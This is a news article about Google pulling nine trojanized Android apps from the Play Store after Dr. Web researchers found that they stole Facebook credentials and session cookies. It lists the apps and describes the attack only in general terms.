The concept of having Android apps on the Google Play Store that are maliciously used by developers against users is not a new thing. And this is one problem that has forced Google to run in an endless race trying to pull Android apps that commit major privacy violations.
A recent report from Ars Technica states that Google has had to remove nine apps from the Play Store. This was after analysts found out that these apps were trojans being used to siphon Facebook login credentials. According to the Dr. Web researchers, the malware had over 5.8 million downloads from these apps posed as popular apps that can be easily found. These apps include:
- Processing Photo
- App Lock Keep
- Rubbish Cleaner
- Horoscope Daily
- Horoscope Pi
- App Lock Manager
- Lockit Master
- Inwell Fitness
- PiP Photo
These apps were used by malicious actors to trick users by loading the Facebook sign-in page. This is only to later load JavaScript from a command and control a server to steal credentials and pass them along to the app.
The report goes on to state that these attackers also stole cookies from the authorisation session. In every single case, Facebook was found to be the target although users could have been easily steered to other internet services.
Of course, Google responded to this report by banning all the app developers from the store. However, this might not be seen as the ultimate solution since the culprits can easily create new developer accounts and publish other apps. The firm may have to actually inspect for the malware itself so the hackers cannot use it.
What s the biggest query after all this is how the apps were able to accumulate so many downloads before the crackdown. Perhaps the new identification requirements for developers might work but there’s still a lot more that Google needs to do to secure its users.
Comments